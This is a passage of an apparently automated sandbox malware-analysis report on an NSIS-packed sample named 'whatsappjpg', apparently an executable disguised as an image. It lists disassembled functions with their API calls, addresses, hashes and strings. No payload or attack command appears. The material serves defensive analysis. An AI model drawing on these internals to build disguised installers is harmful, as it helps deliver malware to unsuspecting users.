                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402614
                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402637
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264D
                                                        • Part of subcall function 00405BD7: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                        • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                      • String ID: 9
                                                      • API String ID: 1149667376-2366072709
                                                      • Opcode ID: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
                                                      • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                      • Opcode Fuzzy Hash: 4b1c8a58dd33f7fe7e15ef8117ed1000f91cb8bfb35d653e6135ad7849d4d288
                                                      • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID:
                                                      • API String ID: 3294113728-0
                                                      • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                      • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                      • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                      • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                      APIs
                                                      • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                      • lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                      • lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                      • SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 2531174081-0
                                                      • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                      • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                      • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                      • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8
                                                      APIs
                                                      • DestroyWindow.USER32(?,00000000), ref: 00402D33
                                                      • GetTickCount.KERNEL32 ref: 00402D51
                                                      • wsprintfW.USER32 ref: 00402D7F
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                        • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                        • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                        • Part of subcall function 00402CFC: MulDiv.KERNEL32(?,00000064,?), ref: 00402D11
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                                                      • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                      • Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                                                      • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                      • GetMessagePos.USER32 ref: 00404A7F
                                                      • ScreenToClient.USER32(?,?), ref: 00404A99
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                      • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                      APIs
                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9B
                                                      • wsprintfW.USER32 ref: 00402CCF
                                                      • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                      • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                      • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                      • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403190
                                                        • Part of subcall function 0040330D: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                      • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                      • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$Pointer$CountTickWrite
                                                      • String ID: x>A
                                                      • API String ID: 2146148272-3854404225
                                                      • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                      • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                      • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                      • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 004061DF
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                      • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 004061F3
                                                      • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403330,00436800,76F93420,00403510), ref: 00406206
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":
                                                      • API String ID: 589700163-165019052
                                                      • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                      • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                                                      • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                      • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252D
                                                      • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402534
                                                      • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402566
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                      • String ID: 8
                                                      • API String ID: 1453599865-4194326291
                                                      • Opcode ID: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
                                                      • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                      • Opcode Fuzzy Hash: eb4f0eac3f684fb2a63f37bc1092f8bc6a44a302634324d4ca23fee1544f7428
                                                      • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                      • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                        • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                        • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                        • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID:
                                                      • API String ID: 1941528284-0
                                                      • Opcode ID: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
                                                      • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                      • Opcode Fuzzy Hash: f85250a5a9e88103d3d651ef37910dcedbb4e657076cd08a1369e1982fdbe284
                                                      • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                      • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                      • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                      • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
                                                      • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                      • Opcode Fuzzy Hash: ebee129f8a245dc929862c077a7183d7f7680bcc51d1a04b4969c9551adf2949
                                                      • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D44
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                      • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID:
                                                      • API String ID: 3808545654-0
                                                      • Opcode ID: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
                                                      • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                      • Opcode Fuzzy Hash: 5126b5a6483c23ca9b923fe170de86e7b0dfb2dc664948fdd2ce29f1bdd8c223
                                                      • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                      APIs
                                                      • SetFilePointer.KERNEL32(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                      • WriteFile.KERNEL32(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$PointerWrite
                                                      • String ID: x>A
                                                      • API String ID: 539440098-3854404225
                                                      • Opcode ID: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                      • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                      • Opcode Fuzzy Hash: b27c88111c9479bfc016d655c0b2bfb1ccfb1f1bf46317cd24110ceb5cc412c0
                                                      • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9
                                                      APIs
                                                      • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                      • wsprintfW.USER32 ref: 00404A10
                                                      • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s
                                                      • API String ID: 3540041739-3551169577
                                                      • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                      • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                      • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
